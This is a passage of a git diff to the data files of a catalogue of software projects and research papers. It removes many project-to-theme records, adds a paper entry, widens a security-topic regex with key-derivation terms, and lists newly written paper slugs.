-{"slug":"sled","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"slim-framework","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"smoltcp","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"snapshot","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"socket-io","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"soketi","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"solana","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"solid","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"sonic","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"sops","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"sortablejs","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"sox","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"spacemacs","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"spin","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"spring-boot","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"sqlite","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"stable-diffusion-webui","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"stagehand","area":"projects","theme":"Agent","themeId":"agents","subcategory":"浏览器自动化","source":"category","confidence":"high","rawCategory":"Agent"} -{"slug":"starlette","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"starlight","area":"projects","theme":"CLI","themeId":"cli","subcategory":"文档站点","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"starrocks","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"starship","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"steel-browser","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"stern","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"storj","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"storybook","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"strawberry","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"streamlink","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"streamlit","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"styled-components","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端样式","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"stylex","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"sui","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"supabase","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"后端 / BaaS","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"supercollider","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"superset","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"supertokens","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 认证","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"surrealdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"svelte","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"sveltekit","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Meta 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"svt-av1","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"swc","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"swr","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"symfony","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"synapse","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"tabulator","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"tailwind","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"CSS","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"tanstack-form","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"tanstack-query","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"数据获取","source":"slugOverrides","confidence":"high","rawCategory":"后端 API"} -{"slug":"tanstack-router","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"tantivy","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"task","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"tauri","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"tdengine","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"tekton","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"teku","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"tempo","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"temporal-polyfill","area":"projects","theme":"CLI","themeId":"cli","subcategory":"projects / 工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"temporal","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"tensorflow","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"terraform","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"testing-library","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"textmate","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"textual","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"the-silver-searcher","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"theia","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"thirdweb-sdk","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"threejs","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"thrift","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"tidb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"tide","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"tig","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"tikv","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"tilt","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"timelinejs","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"timescaledb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"tldraw","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"tmux","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"torchcodec","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"torchtune","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"traefik","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"transformers-video","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"triton-inference-server","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"trl","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"trpc","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"类型与 PL 理论","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"turbopack","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"turborepo","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程化","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"twirp","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"tyk","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"typeorm","area":"projects","theme":"数据库","themeId":"databases","subcategory":"ORM","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"typesense","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ultralytics","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"unified","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"uniswap-v3","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"universal-ctags","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"unsloth","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"unstorage","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"unstructured","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"valibot","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"valkey","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"valtio","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端状态","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"vanilla-extract","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端样式","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"vault","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"vector","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"vega","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"velero","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"vercel-ai","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"vertx","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"vespa","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"victoriametrics","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"video.js","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"videochat2","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"videollama2","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"videollama3","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"viem","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"vim","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"vips","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"vis-network","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"vis-timeline","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"visx","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"vite","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"vitepress","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"vitess","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"vitest","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"测试","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"vllm-multimodal","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"vllm","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"vodozemac","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"voila","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"volta","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"vscode","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"vscodium","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"vue-i18n","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"vue","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"wails","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"walletconnect","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"wandb","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"warp","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"wasmtime","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"语言运行时","source":"candidates.topic","confidence":"high","rawCategory":"编译器"} -{"slug":"weaviate","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"web-vitals","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"web3-js","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"webpack","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"webrtc-rs","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"wezterm","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"whisper","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"why-did-you-render","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"woodpecker","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"wormhole","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"wretch","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"x264","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"x265","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"xh","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"xi-editor","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"xonsh","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"xplr","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"xstate","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"yargs","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"yazi","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"yjs","area":"projects","theme":"分布式系统","themeId":"distributed-systems","subcategory":"协同编辑","source":"category","confidence":"high","rawCategory":"分布式系统"} -{"slug":"yocto-poky","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"yq","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"yt-dlp","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"yugabyte-db","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"zcash","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"zed","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"zellij","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"zephyr","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"zincsearch","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"zksync-era","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"zod","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"表单与校验","source":"slugOverrides","confidence":"high","rawCategory":"后端 API"} -{"slug":"zookeeper","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"zoxide","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"zsh","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"zulip","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"zustand","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"状态管理","source":"category","confidence":"high","rawCategory":"后端 API"} +{"slug":"zookeeper-hunt-2010","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} diff --git a/data/taxonomy.json b/data/taxonomy.json index 1c3fb66ad..d600b02da 100644 --- a/data/taxonomy.json +++ b/data/taxonomy.json @@ -123,7 +123,7 @@ { "pattern": "^NLP$|自然语言", "themeId": "nlp" }, { "pattern": "编译|LLVM|JIT|IR |解析器|lexer|编译器", "themeId": "compilers" }, { "pattern": "可视化|图表|d3|echarts|Canvas|数据可视化|dataviz", "themeId": "dataviz" }, - { "pattern": "安全|隐私|密码|crypto|加密|零知识|侧信道", "themeId": "security-privacy" }, + { "pattern": "安全|隐私|密码|crypto|加密|零知识|侧信道|HKDF|HMAC|KDF|密钥派生|key derivation", "themeId": "security-privacy" }, { "pattern": "软件工程|HCI|认知|调试|TDD|结对|中断|实证", "themeId": "other" }, { "pattern": "硬件|体系结构|CPU|微架构|芯片|Arch", "themeId": "graphics" }, { "pattern": "量化|金融|经济", "themeId": "other" }, @@ -190,7 +190,8 @@ "projects::lottie": { "themeId": "dataviz", "subcategory": "动画" }, "projects::plane": { "themeId": "backend-api", "subcategory": "SaaS 应用" }, "projects::tanstack-query": { "themeId": "backend-api", "subcategory": "数据获取" }, - "projects::zod": { "themeId": "backend-api", "subcategory": "表单与校验" } + "projects::zod": { "themeId": "backend-api", "subcategory": "表单与校验" }, + "papers::compose-future-theorems": { "themeId": "formal-methods", "subcategory": "定理证明" } }, "subcategoryFromCategory": { "共识": "共识与复制", diff --git a/data/written.txt b/data/written.txt index 896d55182..304fda018 100644 --- a/data/written.txt +++ b/data/written.txt @@ -20,6 +20,7 @@ algol-60 align-2021 alpa-2022 alphago +amaryllis-probabilistic-iris amdahl-law-1967 amoeba-1990 ampere-architecture-2020 @@ -74,6 +75,7 @@ big-little-2011 bigbench-2022 biggan-2018 bigtable-2006 +bijou64-varint bitcoin bittorrent-2003 blackwell-architecture-2024 @@ -100,6 +102,7 @@ btrfs-2013 bunz-bulletproofs-2018 burgess-2020-turing-rt bvt-1999 +bw-tree byzantine-generals-1982 cadar-klee-2008 caesar-rexford-2005 @@ -116,6 +119,8 @@ cassandra-2010 catmull-1974-zbuffer catmull-clark-1978 causal-abstraction +cci-agent-scaffolding +ccopd-distillation cell-be-2005 ceph-2006 cerf-kahn-1974 @@ -139,6 +144,7 @@ chronos-2024 chubby ci-effects cimatti-nusmv-2002 +ckks-homomorphic-2017 clark-1988 clarke-cegar-2003 clarke-emerson-1981 @@ -162,9 +168,13 @@ cognitive-load-theory cohen-1985-hemicube colbert-2020 colbert-v2 +columnar-storage-formats-2023 comer-1979-btree compcert compiler-errors +compiler-perf-left-on-table +compose-future-theorems +compositional-incoherence consistency-models-2023 consistent-hashing-1997 constitutional-ai @@ -188,6 +198,7 @@ crdt-json-2017 crdt-shapiro-2011 crdt-sss-2011 croft-harper-1979 +crossover-context-multi-agent cryptoverif-2008 csp-hoare-1978 cstore-2005 @@ -212,6 +223,7 @@ ddpm debate-2018 deberta-2021 debevec-1998-rendering-with-natural-light +debug-adapter-protocol debugging-dichotomy decision-transformer-2021 deepseek-coder-2024 @@ -219,6 +231,7 @@ deepseek-r1 deepspeed-zero deering-1988-triangle-processor demikernel-2021 +demystifying-data-org denali-2002 dense360-2025 desbrun-1999-implicit-fairing @@ -250,9 +263,11 @@ dpo dpr-2020 dqn dreamfusion-2022 +dremel-decade-2020 drizzle-2017 drmm-2016 dropout-2014 